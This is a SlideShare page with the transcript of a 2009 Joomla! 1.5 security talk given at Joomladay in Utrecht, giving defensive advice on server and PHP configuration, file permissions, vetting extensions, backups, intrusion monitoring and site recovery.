Joomladay Netherlands - Security
Upcoming SlideShare
Loading in...5

Joomladay Netherlands - Security



Joomla security presentation given on the Dutch Joomladay

Joomla security presentation given on the Dutch Joomladay



Total Views
Views on SlideShare
Embed Views



4 Embeds 54 51 1 1 1



Upload Details

Uploaded via as OpenOffice

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

Joomladay Netherlands - Security Joomladay Netherlands - Security Presentation Transcript

  • Joomla! 1.5 Security Joomla!day Presentation Utrecht, Netherlands 12 june 2009
  • Is Joomla! safe?
  • Is the World Wide Web Safe?
  • You know, I don't mean any disrespect, but I had to chuckle by the question "Is Joomla! not safe?" since it reminded me of the movie The Marathon Man when the dentist is pulling Dustin Hoffman's teeth out, asking "Is it safe?" and he's so desperate to get the Dentist to stop that he says Yes or No or What do you want to hear? Is Joomla! safe? Quote taken from:
  • I would say - anyone who tells a community that a Web site or a out of the box solution is safe is not being responsible. No , it is not "safe" on the Internet.
  • What is this presentation about?
    • Getting Started
    • Hosting and Server Setup
    • Joomla Setup
    • Site Administration
    • Site Recovery
    Presentation overview
  • Getting started
  • Getting started
  • Getting started
  • Some basic things before we go into details:
    • Report (possible) hack to JSST
    • Please don’t report hacks or proof-of-concepts out in the open, also report them to JSST
    • Stay informed!
      • Automatic Email Notification
      • RSS feed
    Getting started
  • Hosting and server set up Shared hosting? Or Dedicated hosting?
  • Hosting and server set up “ register_globals” “ open_basedir”
    • Configure Apache:
      • Secure important areas with .htaccess
      • Use mod_rewrite and mod_security to block PHP attacks
    • Configure MySQL
      • Implement user accounts with “need-to-know” principle
    • Configure PHP
      • Use PHP 5!
      • Configure your php.ini file properly (most of the times limited with shared hosts)
    Hosting and server set up
    • Configure php.ini
      • Use “ disable_functions” to disable dangerous PHP functions that are not needed by your site.
      • “ Use PHP open_basedir ”
      • Don't use “ PHP safe_mode ” (it gives a false sense of security)
      • Don't use “ PHP register_globals ”
      • Don't use “ PHP allow_url_fopen ”. This option enables the URL-aware fopen wrappers that enable accessing URL object like files.
  • Joomla! setup
    • Some basic rules to think about:
      • Only install official Joomla! versions!
      • Change the default administrator username
      • Protect directories and files
        • Move crucial files outside public directory
        • Ensure that all configurable paths to writable or uploadable directories
        • Protect your log directory (moving it out of document root or .htaccess protect it)
      • Adjust file and directory permissions
        • Set critical directories to 755
        • Set file permissions to 644
      • Remove unneeded files
    Joomla! setup
    • Before you install extensions
      • Always backup (even on your test system)
      • Always test before you install on your life server
      • Check for extension vulnerabilities
      • Download from trusted sites
      • User beware! Check the code quality
      • Test! Test! Test!
      • Remove junk files (all that is not needed)
      • Avoid encrypted code
    Joomla! setup
  • Site administration
    • Use well-formed passwords
    • Maintain a strong site backup process
    • Monitor crack attempts (tripwire, SAMHAIN)
    • Perform manual intrusion detection (manual logfile scan)
    • Stay current with security patches and upgrades
    Site administration
    • Get help the right way
    • Follow a logical and rigorous recovery process
    • Reset your administrator password (and all admins/super admins)
    • Find exploit attempts using the *NIX shell
    Site recovery
  • Links
    • Documentation wiki :
    • Joomla! Security Strike Team (JSST):
    • Report issues to JSST :
  • Joomla! related
    Sites to put RSS feeds on
    Operating systems related
    Sites to monitor when you take security seriously
  • Questions?